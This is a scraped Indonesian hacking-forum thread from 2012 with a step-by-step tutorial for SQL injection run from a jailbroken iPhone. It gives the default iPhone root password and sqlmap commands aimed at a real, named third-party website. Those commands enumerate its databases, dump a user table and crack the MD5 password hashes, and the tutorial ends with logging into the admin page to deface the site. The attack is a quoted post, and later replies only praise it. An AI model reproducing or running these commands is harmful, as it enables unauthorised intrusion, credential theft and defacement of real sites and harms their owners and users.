Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-26-2013, 09:13 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
« Previous 1 ... 3 4 5 6 7 ... 55 Next »

[Tutor] SQLI lewat iPhone..

Home General Computer Multimedia Business Lounge

Pages (3): 1 2 3 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor SQLI lewat iPhone..
04-04-2012, 10:12 PM (This post was last modified: 04-04-2012 10:34 PM by selfdefense.)
Post: #1
selfdefense Offline
./Devilz Commodore
 		Posts: 1,260
Joined: Aug 2010
Reputation: 46
Lightbulb SQLI lewat iPhone..
Assalamualaikum. Wr. Wb.
selamat malam warga DC smua... hai

ketemu lagi dengan ane yg masih belajar biar jadi kaya om DC dsini.. pinter
sharing ilmu kali ini (entah repost ato nga dead) berawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya... ngopi

proses pembuatan dan peralatan yg ane pnya... mohon
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
PHP Code:
http://ininjas.com/repo/ 
3. download and install dua program ini dari cydianya langsung.. seneng
PHP Code:
-Terminal Emulator
-Python (biasanya dah langsung ke install)
-SQLmap 
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
PHP Code:
ketik : su <enter>
password: alpine
(password default root iPhone seluruh dunia...) 
sehati
6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmap; ls 
[Image: i6h6ki.png]
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html 
PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17
Host IP: 79.170.44.145
Web Server: Apache/2
Powered-by: PHP/5.2.17 
8. kita mulai berdoa
kita ketik perintahnya...
PHP Code:
./sqlmap.py -h 
[Image: abjfrs.png]
9. kita coba inject kalem
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbs
kita coba cari nama databasenya.. 
[Image: 120ikhd.png]
[Image: 2luwbgx.png]
10. nah sekarang kita cari table user ato admin ato login ato apapun lah... ngakak
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer --tables 
[Image: 2ennx9s.png]
11. sekarang kita cari column dari tabel yang tadi kita dapet... detektif
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --columns 
[Image: 2u7rb5v.png]
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh.. belajar
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --dump 
[Image: ape52t.png]
13. stelah itu tinggal di decript aja passwordnya... kan MD5 tuh.... asik
ane g ahli masalah decrip2an... banyak om yg lebih jago... tagih
14.cari halaman adminnya trus bebas submit deh ke admin webnya... mantap

okey sekian dulu tutor cupu nan usang dari ane... sbenernya ini di linux sama banget caranya... cman ane mo coba di iphone aja... cheer
semua ini di buat langsung dan di persembahkan untuk warga DC.. bangga
tak lupa ane ucapkan kepada seluruh kawan2 yang udah mau baca tulisan ane yakin ini hanya secuil ilmu yg banyak dah tau... tapi ane cman mo niat berbagi dan sharing aja... ketawa

*/Terimakasih yg utama pada Allah swt yg udah ngasih otak ini bisa ngeluarin ide2 beginian
*/Ortu di rumah yg masih setia ngasih makan dan perhatian
*/miss Vhano wawa
*/ Kampung DC | Petimati, chaer, Ade, note, viska, cruzen, nofia, wisdom, ./rex, civo, dzenway, cakil, 0d3yz, syn_attack, tabun, linuxer, K Family, dita, poti, wenk, eidel, motaro, dan semua yg g kesebut... temenan

sekian dari ane... Wassalamualaikum Wr. Wb.
Find all posts by this user
Quote this message in a reply
 Reputed by :  tabun(+1) , DnA19(+1) , kidofdream(+1) , Super Moderator(+1) , ditatompel(+1) , p0pc0rn(+1) , anharku(+1)
04-04-2012, 10:14 PM
Post: #2
Tetaske12 Offline
./Devilz 1st Cadet
 		Posts: 6
Joined: Apr 2012
Reputation: 0
RE: SQLI lewat iPhone..
(04-04-2012 10:12 PM)selfdefense Wrote:  Assalamualaikum. Wr. Wb.
selamat malam warga DC smua... hai

ketemu lagi dengan ane yg masih belajar biar jadi kaya om DC dsini.. pinter
sharing ilmu kali ini (entah repost ato nga dead) berawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya... ngopi

proses pembuatan dan peralatan yg ane pnya... mohon
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
PHP Code:
http://ininjas.com/repo/ 
3. download and install dua program ini dari cydianya langsung.. seneng
PHP Code:
-Terminal Emulator
-Python (biasanya dah langsung ke install)
-SQLmap 
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
PHP Code:
ketik : su <enter>
password: alpine
(password default root iPhone seluruh dunia...) 
sehati
6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmap; ls 
[Image: i6h6ki.png]
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html 
PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17
Host IP: 79.170.44.145
Web Server: Apache/2
Powered-by: PHP/5.2.17 
8. kita mulai berdoa
kita ketik perintahnya...
PHP Code:
./sqlmap.py -h 
[Image: abjfrs.png]
9. kita coba inject kalem
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbs
kita coba cari nama databasenya.. 
[Image: 120ikhd.png]
[Image: 2luwbgx.png]
10. nah sekarang kita cari table user ato admin ato login ato apapun lah... ngakak
PHP Code:
./sqlmap.py -u http://site.com/catalog.php?id=129 -D web145-pioneer --tables 
[Image: 2ennx9s.png]
11. sekarang kita cari column dari tabel yang tadi kita dapet... detektif
PHP Code:
./sqlmap.py http://site.com -D obieaja -T PIONEER_GROUP_USERS --columns 
[Image: 2u7rb5v.png]
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh.. belajar
PHP Code:
./sqlmap.py http://site.com -D obieaja -T PIONEER_GROUP_USERS --dump 
[Image: ape52t.png]
13. stelah itu tinggal di decript aja passwordnya... kan MD5 tuh.... asik
ane g ahli masalah decrip2an... banyak om yg lebih jago... tagih
14.cari halaman adminnya trus bebas submit deh ke admin webnya... mantap

okey sekian dulu tutor cupu nan usang dari ane... sbenernya ini di linux sama banget caranya... cman ane mo coba di iphone aja... cheer
semua ini di buat langsung dan di persembahkan untuk warga DC.. bangga
tak lupa ane ucapkan kepada seluruh kawan2 yang udah mau baca tulisan ane yakin ini hanya secuil ilmu yg banyak dah tau... tapi ane cman mo niat berbagi dan sharing aja... ketawa

*/Terimakasih yg utama pada Allah swt yg udah ngasih otak ini bisa ngeluarin ide2 beginian
*/Ortu di rumah yg masih setia ngasih makan dan perhatian
*/miss Vhano wawa
*/ Kampung DC | Petimati, chaer, Ade, note, viska, cruzen, nofia, wisdom, ./rex, civo, dzenway, cakil, 0d3yz, syn_attack, tabun, linuxer, K Family, dita, poti, wenk, eidel, motaro, dan semua yg g kesebut... temenan

sekian dari ane... Wassalamualaikum Wr. Wb.

ngintip ahhhh belajar
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:16 PM
Post: #3
DnA19 Away
Devilz e-Magazine Team (DeMT)
*****
DeMT Team 		Posts: 446
Joined: Sep 2011
Reputation: 76
RE: SQLI lewat iPhone..
smangatsmangatsmangat
keren 0mz... mantapmantapmantap
izin belajar dulu... ngacir
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:23 PM
Post: #4
nanda Away
Wahyu Adi Prasetyo
**
Moderators 		Posts: 2,022
Joined: Aug 2011
Reputation: 119
RE: SQLI lewat iPhone..
Gmana mw test ..wong ga pnya iphone nyerah ...

Ts hrus kirim ipone nya jga donk mad
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:29 PM
Post: #5
selfdefense Offline
./Devilz Commodore
 		Posts: 1,260
Joined: Aug 2010
Reputation: 46
RE: SQLI lewat iPhone..
(04-04-2012 10:14 PM)Tetaske12 Wrote:  ngintip ahhhh belajar
silahkan om jangan hanya di intip di koreksi juga takut ane ada yang salah.... hmm
(04-04-2012 10:16 PM)DnA19 Wrote:  smangatsmangatsmangat
keren 0mz... mantapmantapmantap
izin belajar dulu... ngacir

silahkan om di coba... maaf masih cupu.... pinter

(04-04-2012 10:23 PM)DC_Nanda23 Wrote:  Gmana mw test ..wong ga pnya iphone nyerah ...

Ts hrus kirim ipone nya jga donk mad

hhahahah.... ampun om... ane beli 1 biji aja pusing nih.... ngakak
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:36 PM
Post: #6
Tetaske12 Offline
./Devilz 1st Cadet
 		Posts: 6
Joined: Apr 2012
Reputation: 0
RE: SQLI lewat iPhone..
.,., smangat smangat belajar
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:38 PM
Post: #7
chaer.newbie Offline
--------------------------
*****
Dewa 		Posts: 5,288
Joined: Dec 2009
Reputation: 184
RE: SQLI lewat iPhone..
dewa nih
Find all posts by this user
Quote this message in a reply
04-04-2012, 10:41 PM
Post: #8
selfdefense Offline
./Devilz Commodore
 		Posts: 1,260
Joined: Aug 2010
Reputation: 46
RE: SQLI lewat iPhone..
(04-04-2012 10:38 PM)chaer.newbie Wrote:  dewa nih

yg ngajarin ane nya dateng... mantap
om chaer... sehati
Find all posts by this user
Quote this message in a reply
04-04-2012, 11:38 PM
Post: #9
KotoM Offline
Covergay Dewa
 		Posts: 565
Joined: May 2011
Reputation: 58
RE: SQLI lewat iPhone..
heker nyerah
Find all posts by this user
Quote this message in a reply
04-05-2012, 12:03 AM
Post: #10
Reborn Of Code Offline
[+] Devilz Bl4ckeyes [+]
 		Posts: 139
Joined: Feb 2012
Reputation: 19
RE: SQLI lewat iPhone..
wew
ngeri dewa ni ts
ketawa
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (3): 1 2 3 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Post SQLi Disini, sambil Belajar Kimmonosz 270 13,247 05-23-2013 10:51 PM
Last Post: Xscale
  [Tutor] UPDATE 11/10/2012 Tanam Shell lewat PhpMyAdmin ubuntux 49 1,866 05-14-2013 03:52 PM
Last Post: Qolbi
  [Ask] Tentang Sqli nih? FebriNewbie 10 147 05-10-2013 02:00 PM
Last Post: uzumady
  Tools SQLi itzmeamar 16 296 05-04-2013 07:35 AM
Last Post: jundulloh
  SQLI Hunter v1.1 mpratz 5 173 04-20-2013 10:38 PM
Last Post: mpratz
Question [Tutor] Live [SQLi] + Reset Password Joomla momodrock 24 543 03-25-2013 09:51 AM
Last Post: lanionk
  [Share] SQLi Scanner - di Jamin Maknyuss RizaL.eN 11 489 03-09-2013 03:13 PM
Last Post: jawaklagi
  [Tutor] SQLI bypass WAF + POC + IMAGE panjidani 14 394 03-02-2013 04:01 AM
Last Post: Fathan2011
  MS Access Sqli tutz Net_Spy 2 88 11-25-2012 10:36 AM
Last Post: skyb0t
  [Tutor] Cara Mengira Bilangan Columns dalam SQLi p0pc0rn 14 293 11-21-2012 04:13 AM
Last Post: fahamzzz

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-26-2013, 09:13 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE